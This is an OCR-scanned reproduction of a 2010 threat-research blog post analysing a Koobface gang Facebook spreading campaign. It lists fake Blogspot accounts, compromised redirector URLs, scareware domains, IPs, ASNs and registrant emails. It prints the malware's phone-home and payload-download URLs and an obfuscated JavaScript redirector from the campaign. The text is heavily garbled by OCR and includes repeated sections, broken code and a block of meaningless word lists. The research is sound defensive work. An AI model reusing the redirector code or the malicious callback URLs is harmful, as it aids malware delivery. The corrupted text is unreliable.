2accommodation.com - Email: ttvmaill12@hotmail.com 
systemreserves.com - Email: contact@privacy-protect.cn 
cariport.com - Email: contact@privacy-protect.cn 
spyblocktest.com - Email: contact@privacy-protect.cn 
antispywarelist.com - Email: contact@privacy-protect.cn 
checkwhitelist.com - Email: contact@privacy-protect.cn 
chekmalwarelist.com - Email: contact@privacy-protect.cn 


Stay tuned for more updates on recent Koobface gang activities, beyond the Koobface 
botnet. 


Related Koobface gang/botnet research: 

[11]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
[12]10 things you didn’t know about the Koobface gang 

[13]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
[14]How the Koobface Gang Monetizes Mac OS X Traffic 

[15]The Koobface Gang Wishes the Industry "Happy Holidays" 
[16]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[17]Koobface Botnet Starts Serving Client-Side Exploits 

[18]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[19]Koobface Botnet’s Scareware Business Model - Part Two 

[20]Koobface Botnet’s Scareware Business Model - Part One 

[21]Koobface Botnet Redirects Facebook’s IP Space to my Blog 

[22]New Koobface campaign spoofs Adobe’s Flash updater 

[23]Social engineering tactics of the Koobface botnet 

[24]Koobface Botnet Dissected in a TrendMicro Report 

[25]Movement on the Koobface Front - Part Two 
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[26]Movement on the Koobface Front 
[27 ]Koobface - Come Out, Come Out, Wherever You Are 
[28]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [29]Dancho Danchev’s blog. Follow him 
[30]Jon Twitter. 


. http://twitter.com/Real_Koobface 
. http://blogs .zdnet .com/security/?p=5452 


. http: //www.google.com/safebrowsing/diagnostic?site=xorg.pl/ 
. http: //ddanchev. blogspot .com/2010/03/koobface-redirectors-and-scareware.htm 
. http: //ddanchev.blogspot .com/2009/11/koobface-botnets-scareware-business .htm 


. http: //ddanchev. blogspot .com/2009/12/koobface- gang-wishes-industry-happy. htm 
ttp://www.virustotal .com/analisis/69b78dd99321acbidec25cad3da9e9a545cb7554195081e33ca99c23a24b10e3- 12722 
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. http://ddanchev. blogspot .com/2010/03/koobface-redirectors-and-scareware .htm 

12. http://blogs.zdnet .com/security/?p=5452 

13. http://ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 
14. http://ddanchev. blogspot .com/2010/02/how-koobface- gang-monetizes-mac-os-x.htm 
15. http://ddanchev. blogspot .com/2009/12/koobface-gang-wishes- industry-happy .htm 
16. http://ddanchev. blogspot .com/2009/12/koobface-friendly-riccom-1td-as29550.htm 
17. http://ddanchev. blogspot .com/2009/11/koobface-botnet-starts-serving-client .htm 
18. http://ddanchev. blogspot .com/2009/11/massive-scareware-serving-blackhat-seo.htm 
19. http://ddanchev. blogspot .com/2009/11/koobface-botnets-scareware-business.htm 
20. http://ddanchev. blogspot . com/2009/09/koobface-botnets-scareware-business .htm 
21. http://ddanchev. blogspot .com/2009/10/koobface-botnet-redirects-facebooks-ip.htm 
22. http://blogs.zdnet.com/security/?p=4594 

23. http://content .zdnet .com/2346-12691_22-352597 .html 

4. http://ddanchev. blogspot . com/2009/10/koobface-botnet-dissected-in-trendmicro.htm 
25. http://ddanchev. blogspot . com/2009/08/movement - on-koobface-front-part-two.htm 
26. http://ddanchev. blogspot . com/2009/08/movement - on-koobface-front.htm 


N 


27. http://ddanchev. blogspot . com/2009/07/koobface-come- out-come-out-wherever-you. htm 
28. http://ddanchev. blogspot .com/2009/07/dissecting-koobface-worms-twitter.htm 

29. http://ddanchev.blogspot.com/ 

30. http://twitter.com/danchodanche 


6.4.12 Dissecting Koobface Gang’s Latest Facebook Spreading Campaign 
(2010-04-27 14:53) 


San_Up | Quickies (¢ L. 


Video posted by ... Hidden Camera ... 


Video Responses: 10 Text Comments: 70 


Would you like to comment? 


UPDATED: Thursday, April 29, 2010: Google is aware of these Blogspot accounts, and is 
currently suspending them. 


During the weekend, our "dear friends" from [1]the Koobface gang - folks, you’re so not 
forgotten, with the scale of diversification for your activities to be publicly summarized within 
the next few days - launched another spreading attempt across Facebook, with Koobface- 
infected users posting bogus video links on their walls. 


« Recommended reading: [2]10 things you didn’t know about the Koobface gang 


What’s particularly interesting about the campaign, is that the gang is now start to publicly 
acknowledge its connections with [3]xorg.pl (Malicious software includes 40706 scripting 
exploit(s), 4119 trojan(s), 1897 exploit(s), with an actual subdomain residing there embedded 
on Koobface-serving compromised hosts. 
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Moreover, the majority of scareware domains, including the redirectors continue using 
hosting services in Moldova, AS31252, STARNET-AS StarNet Moldova in particular. 


¢ [4] Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 


With the campaign still ongoing it’s time to dissect it, expose the scareware domains portfolio 
and the AS29073, ECATEL-AS connection, with the Koobface gang a loyal customer of their 
services since November, 2009. AS29073, ECATEL-AS Koobface gang connections: 


¢ [5]Koobface Botnet’s Scareware Business Model - Part Two 


¢ [6]The Koobface Gang Wishes the Industry "Happy Holidays" 


-blogspot,com 
ain. php? 
1ain=1 


161:1002 
57:440 {go.js?b 


go. js?bdb2 
go. js?bd 


Automatically registered Blogspot accounts used as bogus video links across Facebook: 
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aashikamorsing.blogspot.com 
alpezajeromie.blogspot.com 
andcoldjackey. blogspot.com 
asiaasiabenzaidi.blogspot.com 
atalaygraciani.blogspot.com 
barsheshetshakirat. blogspot.com 
battittastelzer. blogspot.com 
beckermasico.blogspot.com 
biedlerharjit.blogspot.com 
britainudobot.blogspot.com 
bruchnadirnadir.blogspot.com 
bryonbryonhofhenke.blogspot.com 
ceceliaverner.blogspot.com 
centofantiaviran.blogspot.com 
codeycodeymarcott.blogspot.com 
cottinghamginnyginny.blogspot.com 
courtenayharry.blogspot.com 
dalton-daviesheinee. blogspot.com 
dipietroaudrea.blogspot.com 
ericssonbrigid.blogspot.com 
ervinervinturnquest.blogspot.com 
fashingbauerkylerkyler.blogspot.com 
felicetanae.blogspot.com 
friedamignogna.blogspot.com 


friedlamiraslani.blogspot.com 
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garthgarthheal.blogspot.com 
gavin-williamslielie.blogspot.com 
ginnoviaharbottle.blogspot.com 
grinolsisanna.blogspot.com 
hamiltondesantis.blogspot.com 
hananhananmoros-hanley.blogspot.com 
heberheberdellinger.blogspot.com 
iftikharkacykacy.blogspot.com 
imtiazzimmer.blogspot.com 
ireneirenejasmen.blogspot.com 
jacojacowintermeyer.blogspot.com 
jameishaleninger.blogspot.com 
jhalaagustin. blogspot.com 
johnathenmirani.blogspot.com 
kassablynnelle.blogspot.com 
kaycieazoni.blogspot.com 
keeferjeneejenee.blogspot.com 
keibakeibaclarembeaux.blogspot.com 
kieroncrowdus.blogspot.com 
kilcullenheadhead.blogspot.com 
kreuzaavins.blogspot.com 
labbatoalphaj.blogspot.com 
lellpeyton.blogspot.com 
marleenmckoi.blogspot.com 


mccarlbargin.blogspot.com 
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mendizabalnayranayra.blogspot.com 
mitranoshaghayegh.blogspot.com 
momoneybeltz.blogspot.com 
mushenkolirian.blogspot.com 
navarretemcarthur.blogspot.com 
nekolnekoltasler.blogspot.com 
nightrasteyn.blogspot.com 
nushnushcave.blogspot.com 
ortiz-maynardyvreene.blogspot.com 
padalinodarcydarcy.blogspot.com 
pantslalala.blogspot.com 
papsteinhatemwahsh. blogspot.com 
pavanpavandekelver.blogspot.com 
pencekleighan.blogspot.com 
puzderdenzel.blogspot.com 
rabiarabiacarruth.blogspot.com 
raeferaefejhanmmat.blogspot.com 
raheelolu.blogspot.com 
ranaranakundu. blogspot.com 
sabeenhunjan.blogspot.com 
serroukhshymia.blogspot.com 
sertimamislay. blogspot.com 
shannonschronce.blogspot.com 
sheridanpaltiel.blogspot.com 


slomovitzvaughna.blogspot.com 
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soccicoitcoit.blogspot.com 
stengel-bohneinaveinav.blogspot.com 
suedeglenna.blogspot.com 
sylvainbarnes-rivers.blogspot.com 
tammeybutenko.blogspot.com 
tartagliatrayvis.blogspot.com 
tasunanette. blogspot.com 
teddiedommasch.blogspot.com 
temitopetodorova.blogspot.com 
terranovataiwan.blogspot.com 
torneyatsushi.blogspot.com 
trovatohaiahaia.blogspot.com 
tuncelintrieri.blogspot.com 
vislayovadovad.blogspot.com 
wellkensie.blogspot.com 
yabsleyjessajessa.blogspot.com 


zedzedmorelle.blogspot.com 


UPDATED: Thursday, April 29, 2010: 


the Koobface gang: 
aaslehnekaya.blogspot.com 
aimanaimanpaulis. blogspot.com 
altonaltonbruyninckx.blogspot.com 
annemiekenorford.blogspot.com 
asghardch.blogspot.com 


atencioishmael.blogspot.com 


Another update on Blogspot Accounts courtesy of 
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ativanichayaphongdionysios.blogspot.com 
ayorindesavoia.blogspot.com 
bagnoandreae.blogspot.com 
bakalarczykmaipumaipu.blogspot.com 
baribarithulin.blogspot.com 
beavordawnedawne.blogspot.com 
boninidivandivan.blogspot.com 
cabooterfinne.blogspot.com 
chakkarinlehnertz.blogspot.com 
chavarriaarumugam.blogspot.com 
coleirolenaylenay. blogspot.com 
colkittmogens.blogspot.com 
crummittgerhardt.blogspot.com 
dahmeialeveque.blogspot.com 
dalmolinparamparam.blogspot.com 
danaedanaemadan.blogspot.com 
danmakumaak.blogspot.com 
dauntazusaazusa.blogspot.com 
devrimmasaimasai.blogspot.com 
dicksdeplancke.blogspot.com 
dormiedyismael.blogspot.com 
dremadremareany.blogspot.com 
duffinflippen. blogspot.com 
eliyahneubecker. blogspot.com 


eloragiogio.blogspot.com 
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faubertmacarena.blogspot.com 
friedlamiraslani.blogspot.com 
gallianinijanija.blogspot.com 
gandolphscootscoot.blogspot.com 
garbsayrinayrin. blogspot.com 
geerbergpovlipovl.blogspot.com 
gennygennytjoeng.blogspot.com 
gianiniomegalmegal.blogspot.com 
griffithlampack-layton.blogspot.com 
guerrettebrchibrchi.blogspot.com 
guillemineauramyaramya.blogspot.com 
gunheedomenick.blogspot.com 
haisedymond.blogspot.com 
halahalafales.blogspot.com 
hamidoujacijaci.blogspot.com 
hamminganoush.blogspot.com 
honamisouliotis.blogspot.com 
japeriagoding.blogspot.com 
jaymeecleto.blogspot.com 
jinghuamarmorale.blogspot.com 
kadeemrebsamen.blogspot.com 
karokaroliney. blogspot.com 
kashmirahoeger.blogspot.com 
kasidasaugust.blogspot.com 


kattylaitia.blogspot.com 
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kaynatferetos.blogspot.com 
kimberlikohImann.blogspot.com 
kissikshaney.blogspot.com 
kjerstisatterwhite-landry. blogspot.com 
korbessamessam.blogspot.com 
kozubmarshand.blogspot.com 
kruthjancijanci.blogspot.com 
krystellecahoon.blogspot.com 
kuroiwadelphdelph.blogspot.com 
laakkokimkim.blogspot.com 
labbatoalphaj.blogspot.com 
leichtmarjmarj.blogspot.com 
leludis-matarangasdeyonna.blogspot.com 
lescailletpetopeto.blogspot.com 
letsongrover.blogspot.com 
liermanramadan.blogspot.com 
lindingrajkishan.blogspot.com 
linsjerchell.blogspot.com 
lorrilorrihosgor.blogspot.com 
maglifitfit.blogspot.com 
matsumarudeserae.blogspot.com 
mcsteinniecey.blogspot.com 
melitalynnelynne.blogspot.com 
menezeswendywendy.blogspot.com 


mimosepalazon.blogspot.com 
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mottmottzengel.blogspot.com 
naysanmutton.blogspot.com 
nicolenabershon.blogspot.com 
nidonidobuetow.blogspot.com 
ninaninalottin. blogspot.com 
nonziodarasha.blogspot.com 
pandushalmon.blogspot.com 
pawelpawelpoti.blogspot.com 
paytonbeegle.blogspot.com 
phillipoeleaseleas.blogspot.com 
philpottlurelle.blogspot.com 
pipenhagennguyen. blogspot.com 
plattsdatoria.blogspot.com 
plomaritislaurylaury.blogspot.com 
polmantameltamel.blogspot.com 
polopoloangulo.blogspot.com 
porrettifarmers. blogspot.com 
radieradiecatalina. blogspot.com 
raenellegreathouse.blogspot.com 
ranaeranaerossy.blogspot.com 
reidreidmiele-crifo.blogspot.com 
rickyrickydonis. blogspot.com 
roselinegilvin.blogspot.com 
russobriarbriar.blogspot.com 


salizaguayanilla.blogspot.com 
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samuelesedere.blogspot.com 
sanchepascasie.blogspot.com 
sangyoungpadalecki.blogspot.com 
scarthscrewlie.blogspot.com 
schaumburgirishirish.blogspot.com 
schubringdheledhele.blogspot.com 
scorahchreechree.blogspot.com 
shakehcoletto.blogspot.com 
shaqareqninette. blogspot.com 
shaw-zorichemmanemman.blogspot.com 
shortalgerongeron.blogspot.com 
singhoffertymisha.blogspot.com 
sinnathuraiperminas.blogspot.com 
skjutarevikram.blogspot.com 
spataforaannamay.blogspot.com 
staats-meliaahronahron.blogspot.com 
tagantagankissane.blogspot.com 
tamietamiedemirkol. blogspot.com 
tamillecavitt.blogspot.com 
tommiekerstetter. blogspot.com 
tosunsangbum. blogspot.com 
treechadacoppage.blogspot.com 
treziajoanjoan.blogspot.com 
triadorlachauna.blogspot.com 


tukellyaburrage.blogspot.com 
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tyrisaoverly.blogspot.com 
ulrikaraithatha. blogspot.com 
valericlarissa.blogspot.com 
ventronejokerjoker. blogspot.com 
victorinomeharmehar.blogspot.com 
vikvikruaut.blogspot.com 
virajanrajan.blogspot.com 
wasonmarilynn.blogspot.com 
wendewendeschyma.blogspot.com 
whitwhitmontoure.blogspot.com 
wynnhannan.blogspot.com 
xochitlvillenurve.blogspot.com 
yaoskalongthorne.blogspot.com 
youyoustreit. blogspot.com 


zickkirrakirra.blogspot.com 
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crisis Gf gleam lambaste Exe? outwit rob skver statue sufScient tumvulteous twine 


blight boor boorish duress infernal nominate old-fashioned put-up rubbish suggestive tamper tolly 


chque consultast cycle down edification femt heavy-handed impact loose make-up pleasze quack shrubbery tncky 
basic dapple fickle harmiess leaden mute performance te 


amply clergyman chsgustng Grst-rate generally length merry perumeter prepare rough tempestuous unreBned wsitor 


Cannibal chime distince for gusc gut march mockery persuasive rationale scravl slim stoiciss stray testimonial 


cap downwards enchanting flout frightful fritter gratitude migrant mismatched officer playboy single-minded 


actrve adolescent deviate expedite Eeery Gash for obsesseve premedaated prepare settle sobdarty suggestible 


couch curt passable ply refuse} scepticism 


adaect ¢ goss interval mvanable pumble mournful mutahon noseless resemble secular 


bowl? combine devoous godsend landla sting revelry rou, skin social uproanous 


book boundary crest engraving fitful hop idyllic memory personally popularity raise remiss revolve stipulate 


bereave discriminating engine hircl® moonshine nab pristine rap anated 


aged ahead calendar haw inviting metropolis paramount reconnostre understand upheaval usage 


The Blogspot accounts redirect to the following compromised Koobface and scareware 
serving domains: 


cartujo.org /private-clips/main.php?87bb8f2 
cerclewalloncouillet.be /main.movie/main.php?28d 
cseajudiciary.org /animateddvd/main.php?c8 
de-nachtegaele.be /main/main.php?b04ebb 

ediltermo.com /common.film/main.php?deccfd 
forwardmarchministries.org /candid movie/main.php?42d1 
highway77truckservice.com /pretty-clip/main.php?7bb2 
kcresale.com /crazyvids/main.php?2ee 
libermann.phpnet.org /comicperformans/main.php?9b5a5a 
lode-willems.be /cute clip/main.php?be2 
lunaairforlife.com /crucial-clips/main.php?d3d6ccfe 


mainteck-fr.com /complete-movie/main.php?f6 
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nottinghamdowns.com /criminaltube/main.php?2388d 
programs.ppbsa.org /crazy video/main.php?0ea1969 
richmondpowerboat.com /yourtv/main.php?89fbO 
scheron.com /delightful demonstration/main.php?e2f92 
Training.ppbsa.org /comic dvd/main.php?f9261f 


vangecars.it /crazy-films/main.php?827da 


Detection rates for Koobface samples and a sampled scareware: 


setup.exe - [7]Trojan.Generic.KD.8890 - Result: 9/40 (22.50 %) phones back to: 


proelec-dpt.fr/.85rfs/?action=Idgen &a=-1394498804 &v=108 &c fb=0 &ie=7.0.5730.13 


proelec-dpt.fr/.85rfs/?action=fbgen &v=108 &crc=669 


proelec-dpt.fr/.85rfs/?getexe=p.exe 


p.exe - [8]Trojan.Drop.Koobface.J; W32/Koobface.GUB - Result: 5/41 (12.2 %) 


koob.js - [9]Trojan:JS/Redirector - Result: 1/41 (2.44 %) 


<title>Loading</title> 

cneta name*“robots” content*"noindex, nofollow, noarchive"> 

<soript> 

function a890b07atibS7e303 £82 () (tey( window. parent. location= location; }catch(e) ()}try(vindow.cop. location=location: ) catch (e) 

() } window. onerror=a890b0 7Tati4bS7e3 03 262 ; sf (window. parent. frames. length>O) s¢ (window. parent .document .body. inserBTHL) : 

</script> 

<soript> 

berod3 tJdelsdceTale"NgqxSh5cluvcatEyc*.replace (/(qxhjsvcaty) +/¢g, 7") : if (navigator .appVersion. indexO? (bf£f9d3i7del3accTa®z) >0) (window. eO03b380¢ 
function G@4féfifh4O0e7ic() (var ansabic20Gc-vindov.navigator.userAgent:var ab9f2$2e773 10c-anabc200c. indexOt (ht(9d3 l7aclidcctafl+ 

‘p2a2 (ab9fZ2S2e77310c>0) return parse Int (asabSc208c. substring (ab9f252¢773 10c+S, aaabGc208c. indexOf('.*',ab9f2S2e77310c) )) sreturn 

O; )window. 29051 7aatSerd4f6fitb4de7Tic();) function g522dfeaa (1730dd44) ( sf (window. cO3bIG0dL2863) ( if (window. £9051 7aatse<6) 

i vimdow, open (1730da44) : belse(docupent.getEilement ByIid(“ccé4deadc”) . launchURL (1730dd44) >) belset location. href+1730da44;)) function hetbe2atbet 
{(qgS22dtfean (' iiss i r 2 r pi ‘ 

false;:) if (window. attachEvenc) window. attachEvent ('onunload' ,hedbb2aéb6676) ;else window. addEventListener (* unload’ , hcdbb2a6b6876, false) : 


n sca ; mid-31 en4dbizre és” jreturn 


k2119c64b3 dbO6fbd="<fnjIbOIKEqQUmklEQCkTIlmql binndo=pichcjoppé6f4openianoqdnnbget viqijdfntmolhof*0) jkhinelojimngihj}jtmnk=jff0qq”. replace (/ 
/ge"")2 

k2119cé4b3dbO6thd+=" gkgChtlesAbminves pox IgtDip=qiCriyvL ehkxSubblaclbpmet: neqi écgBnentfexgSekl2 ufbaviogSup) vcemiv-thdubSyermioyAlcgs-tugr] 
tnlj} BavxylmveSvnegnivs-yt yteOyvirs0 LuqvecglOegnioshal Fkhk37sc9 ibaF pqqkat vAifqy6qga".replace (/ (gkbtsmvjoxflpqriyvhuaenc] +/g,"") 2 
K2119cé4b3dbOé6fbder" joot yhhpmeghgh*hathpkgepfish ldimemygnat idhodkdnh/ khgxgg~dmotideokhbhjegkcgtgth>gh <gPLAktdRhkAgkEh”. replace (/ (Jashgfd) +, 
k2119c64b3dbO6thd+=" bichbALicMikE js f<f£kSebesinckjdiPibijacyicSmtmjatektCmhb jafcrniges jbEciv) semnkthab 
PVowiAJCLb1i1iVEiib-ffkTwteufeib>m”. replace (/(bfcikjm) +/g,"")7 

K2119cé64b3 dbO6rbde-"<pPgsAqcRmhsAqgdNh hagNdgAqhNEhis)«phlbAisunigkt jroigegbhetchagqrhltgp 

lgniVqdAjthgtkcEidep-digtgerdug! letf>mhh". replace (/ [pgiqcmhed) lbnkf£) +/¢g, 7"): 

k2 119064b3dbO6fbd+="<khpPcARAKDNKkk jpnigajbomjej*ffubhipMhkjodege ckbvfhacclguke=fnpohcnkjecbpg>c”. replace (/(khpcbjgf) +/g,7") 2 
K2119cé4b3 dbOs6rbde"<gdgPdhALiRkbAikM ckndkacgem)pei*pPijbplathyibpbChfodkughincdtgg? dovijafcditdhkugdhhtesghSphastec9gh9r> 

<de/ hbOchBgligcEhbCohhTpi>kt".cepiace (/ (gdhtikbejp) +/g,°") = 

Gocwment . write (k2119c64b3dbO06fbd) : 
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The scareware serving domain embedded on all of the Koobface-serving compromised 
hosts is internet-scanner.xorg.pl?mid=312 &code=4db12f &d=1 &s=2 - 195.5.161.125 - 
AS31252, STARNET-AS StarNet Moldova. 


Parked on 195.5.161.125 is the rest of the scareware domains portfolio: 
antispy-detectnl1.com - Email: test@now.net.cn 
antispy-detectn2.com - Email: test@now.net.cn 
antispy-detectn3.com - Email: test@now.net.cn 
antispy-detectn5.com - Email: test@now.net.cn 
antispy-detectn7.com - Email: test@now.net.cn 
antispy-detectz2.com - Email: test@now.net.cn 
antispy-detectz4.com - Email: test@now.net.cn 
antispy-detectz5.com - Email: test@now.net.cn 
antispy-detectz7.com - Email: test@now.net.cn 
antispy-detectz9.com - Email: test@now.net.cn 
antispy-scan4i.com - Email: test@now.net.cn 
antispy-scan5i.com - Email: test@now.net.cn 
antispy-scan6i.com - Email: test@now.net.cn 
antispy-scan7i.com - Email: test@now.net.cn 
antispyscan85.com - Email: test@now.net.cn 
antispyscan89.com - Email: test@now.net.cn 
antispyscan91.com - Email: test@now.net.cn 
antispyscan92.com - Email: test@now.net.cn 
antispyscan93.com - Email: test@now.net.cn 


antispy-scan9i.com - Email: test@now.net.cn 
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antispyware-nol.com - Email: test@now.net.cn 


antispyware-no3.com - Email: test@now.net.cn 


antivirla.com.xorg.pl 


antivirus-detect21.com - Email: 


antivirus-detect23.com - Email: 


antivirus-detect25.com - Email: 


antivirus-detect27.com - Email: 


antivirus-detect29.com - Email: 


antivirus-detectzl.com - Email: 


antivirus-detectz2.com - Email: 


antivirus-detectz5.com - Email: 


antivirus-detectz7.com - Email: 


antivirus-detectz9.com - Email 


test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 


test@now.net.cn 


antivirus-lvl.com - Email: 


antivirus-lv2.com - Email: 


antivirus-lv3.com - Email: 


antivirus-lv5.com - Email: 


antivirus-lv8.com - Email: 


test@now.net.cn 
test@now.net.cn 
test@now.net.cn 
test@now.net.cn 


test@now.net.cn 


antivirus-topl.com - Email: test@now.net.cn 


antivirus-top2.com - Email: test@now.net.cn 


antivirus-top6.com - Email: test@now.net.cn 


antivirus-top8.com - Email: test@now.net.cn 


be-secured.xorg.pl 
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antspy detecn7. com 
anaspy-scan7icom 
arfspyware eo3 com 
arfvirus-detect23 com 
artvirus-detect2’s com 
artirus-detecn? com 
artirus-detect2d com 
antvess 291 com 
antviews 4092 com 
get protecton xorg pl 
Spyware sweep] com 
Spyware sweeplicom 
Spyware sweep2i com 
Soyware-sweepd com 
Spyware-sweepdi com 
Spyware-sweepsicom 
spyware sweeps com 
Spyware sweep? com 
Spyware sweeps com 
Spyware sweepdicom 
views -sweecertt com 
Vest sweeper] com 
Views sweeper? com 
Views sweepers com 
vows sweeperé com 


Ves sweepers com 


bestantivirus1.com.xorg.pl 
bestscanmalware.com.xorg.pl 
best-security.xorg.pl 
defender20.xorg.pl 


fastantivirusscanner15.com.xorg.pl 
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at 


1955.16 024 ——th-ge 4531252 


fastmalwarescan15.com.xorg.pl 
fast-scan.xorg.pl 
fastweb-scanner.com.xorg.pl 
get-protection.xorg.pl 

my-computers.xorg.pl 

protection100.xorg.pl 
protection-center1.xorg.pl 
protector10.xorg.pl 

securel10.xorg.pl 

security1.xorg.pl 

security100.xorg.pl 

spy-defenderl.com 
spydefenderl.com.xorg.pl 
spydefender11.com.xorg.pl 
spy-defenderla.com - Email: test@now.net.cn 
spy-defender2.com - Email: test@now.net.cn 
spy-defender2a.com - Email: test@now.net.cn 
spy-defender4a.com - Email: test@now.net.cn 
spy-defender5.com - Email: test@now.net.cn 
spy-defender6a.com - Email: test@now.net.cn 
spy-defender8a.com - Email: test@now.net.cn 


spy-defender9.com - Email: test@now.net.cn 


spy-protection01.com - Email: test@now.net.cn 


spy-protection1l.com - Email: test@now.net.cn 
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spy-protection14.com - Email: test@now.net.cn 
spy-protection17.com - Email: test@now.net.cn 
spy-protection19.com - Email: test@now.net.cn 
spy-protection3.com - Email: test@now.net.cn 
spy-protection4.com - Email: test@now.net.cn 
spy-protection6.com - Email: test@now.net.cn 
spy-protection8.com - Email: test@now.net.cn 
spy-scanner2i.com - Email: test@now.net.cn 
spy-scanner6i.com - Email: test@now.net.cn 
spy-scanner8i.com - Email: test@now.net.cn 
spyware-sweep1.com - Email: test@now.net.cn 
spyware-sweepli.com - Email: test@now.net.cn 
spyware-sweepz2i.com - Email: test@now.net.cn 
spyware-sweep3.com - Email: test@now.net.cn 
spyware-sweep3i.com - Email: test@now.net.cn 
spyware-sweep4i.com - Email: test@now.net.cn 
spyware-sweep5.com - Email: test@now.net.cn 


spyware-sweep/7.com - Email: test@now.net.cn 
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System folders 
System Tavis 


> = 
2) View system infcemation ad Dred Documents My Documents 
US ASS ce remove programs @ 6 Vwuses found @ 6 Viruses found 
D> change a settings Hard drtve 

= Hard drown (C2) 
Other Places =e ie 


@ 12 Viewses found 
Wd My teetrecrt Places 
©) > ccosmerts 

© Srared Qocumerts 


Security 


DO certrei Paret 


Name Type 


Q Adverare totber 

QD WI2Mypics. Worm 36352 Wus 
OQ wierd dtere vs 
@ Gackdoor.winS2.Haxdeor.qu Wrus 
@ TrojanFakestert.355 vs 


Recommend: Chick “Start Protection” button to erase af threats 


spyware-sweep8.com - Email: test@now.net.cn 
spyware-sweepQi.com - Email: test@now.net.cn 
virus-sweeperOi.com - Email: test@now.net.cn 
virus-sweeperl.com - Email: test@now.net.cn 
virus-sweeper2.com - Email: test@now.net.cn 
virus-sweeper2i.com - Email: test@now.net.cn 
virus-sweeper3.com - Email: test@now.net.cn 
virus-sweeper4i.com - Email: test@now.net.cn 
virus-sweeper6.com - Email: test@now.net.cn 
virus-sweeper7i.com - Email: test@now.net.cn 
virus-Ssweeper8.com - Email: test@now.net.cn 
virus-sweeper8i.com - Email: test@now.net.cn 
win-antispyware10.com.xorg.pl 
windefender1.xorg.pl 


windows-secure.xorg.pl 


@ WARNING = * 


Threat level 
High ” 
Mediu 
Medrunns 
Hegh 


| 


a 


woe 


Spyware 6 soltware, which can gather information from user's computer 
Proud Internet conection and send them to ts crester. Gather 
formation can be passwords, emai adresses and af Chat dota, whichis 
igertart for you 
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win-security.xorg.pl 


winwebscanner10.com.xorg.pl 


Parked within AS31252, STARNET-AS StarNet Moldova are also: 195.5.161.11; 195.5.161.145 
spy-scanner20.com - Email: test@now.net.cn 

spy-scanner30.com - Email: test@now.net.cn 

spy-scanner3i.com - Email: test@now.net.cn 

spy-scanner40.com - Email: test@now.net.cn 

spy-scanner4i.com - Email: test@now.net.cn 

spy-scanner60.com - Email: test@now.net.cn 

spy-scanner80.com - Email: test@now.net.cn 

virscanner-done4.com - Email: test@now.net.cn 


virscanner-done5.com - Email: test@now.net.cn 


- Detection rate for the scareware' sample: Setup _312s2.exe - [10]Heuris- 
tic.BehavesLike.Win32.Trojan.H - Result: 5/40 (12.50 %) phones back to windows- 
mode.com/?b=1sl1 - 89.248.168.21, AS29073, ECATEL-AS , Ecatel Network - Email: 
contact@privacy-protect.cn 
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antispywarelist.com 


checkwhitelist.com 


chekmalwarelist.com 


89.248.168.21 89.248.168.0/24 ——“S-ge as29073 


firewall-rules2.com 


systemreserves.com 


windows-mode.com 


Parked on the phone-back IP are also the following domains: 
firewall-rules2.com - Email: contact@privacy-protect.cn 
version-upgrade.com - Email: contact@privacy-protect.cn 
2accommodation.com - Email: ttvmaill12@hotmail.com 
systemreserves.com - Email: contact@privacy-protect.cn 
cariport.com - Email: contact@privacy-protect.cn 
spyblocktest.com - Email: contact@privacy-protect.cn 
antispywarelist.com - Email: contact@privacy-protect.cn 
checkwhitelist.com - Email: contact@privacy-protect.cn 


chekmalwarelist.com - Email: contact@privacy-protect.cn 


Stay tuned for more updates on recent Koobface gang activities, beyond the Koobface 
botnet. 


Related Koobface gang/botnet research: 


[11]Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
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[12]10 things you didn’t know about the Koobface gang 


[13]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface 
Gang 


[14]How the Koobface Gang Monetizes Mac OS X Traffic 

[15]The Koobface Gang Wishes the Industry "Happy Holidays" 
[16]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[17]Koobface Botnet Starts Serving Client-Side Exploits 

[18]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[19]Koobface Botnet’s Scareware Business Model - Part Two 
[20]Koobface Botnet’s Scareware Business Model - Part One 
[21]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[22]New Koobface campaign spoofs Adobe’s Flash updater 
[23]Social engineering tactics of the Koobface botnet 

[24]Koobface Botnet Dissected in a TrendMicro Report 
[25]Movement on the Koobface Front - Part Two 

[26]Movement on the Koobface Front 

[27]Koobface - Come Out, Come Out, Wherever You Are 


[28]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [29]Dancho Danchev’s blog. Follow him 
[30]Jon Twitter. 


1 

2 

3 

4 

5 

6 
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9. 


10. 


11. 
12. 
13. 
14. 
15. 
16. 
17. 
18. 
19. 


20. 
21. 
22. 
23. 
24. 
25. 
26. 
27. 
28. 
29. 


30. 


http: //www.virustotal.com/analisis/30£5371a67cb6001f 8bb5dc2076bfb17c24c675599e99d32adc049610bc6620b- 12722 
95423 


https://www.virustotal.com/analisis/8110b790ea6600f 8b7 12cc68b195302c450a3993df84f7 163dbb7938d22e55d0- 127 
2294429 


http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 


http 
http 


http: 


//ddanchev. blogspot 


.com/2010/03/koobface-redirectors-and-scareware . html 


//blogs.zdnet .com/security/?p=5452 


//ddanchev. blogspot 


//ddanchev.blogspot. 
//ddanchev.blogspot. 
//ddanchev.blogspot. 


//ddanchev. blogspot 
//ddanchev. blogspot 


//ddanchev.blogspot. 
//ddanchev.blogspot. 


.com/2010/02/diverse-portfolio-of-scarewareblackhat. html 
//ddanchev.blogspot. 


com/2010/02/how-koobface- gang-monetizes-mac-os-x.html 
com/2009/12/koobface-gang-wishes-industry-happy.html 

com/2009/12/koobface-friendly-riccom-1td-as29550. html 
com/2009/11/koobface-botnet-starts-serving-client .html 


.com/2009/11/massive-scareware-serving-blackhat-seo.html 


.com/2009/11/koobface-botnets-scareware-business. html 


com/2009/09/koobface-botnets-scareware-business.html 


